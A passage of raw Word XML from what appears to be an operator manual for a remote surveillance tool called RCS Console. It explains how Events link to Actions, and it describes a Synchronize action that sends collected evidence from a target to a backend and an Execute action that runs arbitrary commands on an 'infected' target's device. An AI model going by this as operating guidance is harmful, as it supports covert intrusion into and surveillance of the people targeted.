            <w:r w:rsidR="00BE1786" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows event ID</w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="00582550" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the </w:t>
            </w:r>
            <w:r w:rsidR="00827B24" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows event source (</w:t>
            </w:r>
            <w:r w:rsidR="00C11CD3" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. </w:t>
            </w:r>
            <w:r w:rsidR="00827B24" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>system, application).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006414AB" w:rsidRDefault="006414AB" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E243D1" w:rsidRDefault="00E243D1" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B20850" w:rsidRDefault="00B20850">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444FB9" w:rsidRPr="004B1CEA" w:rsidRDefault="00444FB9" w:rsidP="00444FB9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Actions</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> done through the connection points “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Repeat” </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The “Start” connection is represented by a green arrow. The “Repeat” connection is represented by a blue arrow. The “End” connection is represented by a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00E243D1" w:rsidP="00E243D1">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E243D1" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E89E503" wp14:editId="4B237B02">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0"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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B32CA2E" wp14:editId="56830101">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="00057420" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E243D1" w:rsidRDefault="0010013A" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.13</w:t>
            </w:r>
            <w:r w:rsidR="00E243D1">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E243D1" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00E243D1">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E243D1" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">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E243D1" w:rsidRPr="008438CE" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>START ACTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E243D1" w:rsidRPr="00057420" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F04B48" w:rsidRDefault="0010013A" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.14</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F04B48" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E243D1" w:rsidRDefault="00E243D1" w:rsidP="00F04B48">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E243D1" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STOP ACTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E243D1" w:rsidRDefault="00E243D1" w:rsidP="00E243D1">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04B48" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F04B48" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ACA6956" wp14:editId="4238109D">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="95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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F04B48" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F04B48" w:rsidRPr="00057420" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F04B48" w:rsidRDefault="0010013A" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.15</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F04B48" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F04B48">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F04B48" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">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F04B48" w:rsidRPr="004B1CEA" w:rsidRDefault="00F04B48" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REPEAT ACTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D3393" w:rsidRDefault="003D3393" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA1726" w:rsidRDefault="00FA1726" w:rsidP="00C6270B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="00B20850">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc372642488"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Desktop Actions Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="00C6270B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C6270B" w:rsidRPr="00B965F4" w:rsidRDefault="00C6270B" w:rsidP="00C6270B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By clicking on the button Add Action you can add a new element in the line of Actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00BE55D0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within a Desktop Factory there’re 5 different Actions available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00BE55D0">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56"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE55D0" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:128.25pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId116" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1043" DrawAspect="Content" ObjectID="_1446455258" r:id="rId117"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Synchronize</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009E1646" w:rsidRPr="00671455" w:rsidRDefault="009E1646" w:rsidP="009E1646">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E1646">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Synchronize </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="009E1646">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sends all the pending evidences from the target to the RCS Backend and checks for agent configuration updates.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:128.25pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId118" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1044" DrawAspect="Content" ObjectID="_1446455259" r:id="rId119"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Execute</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00657193" w:rsidP="00657193">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Execute </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction runs an arbitrary command on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
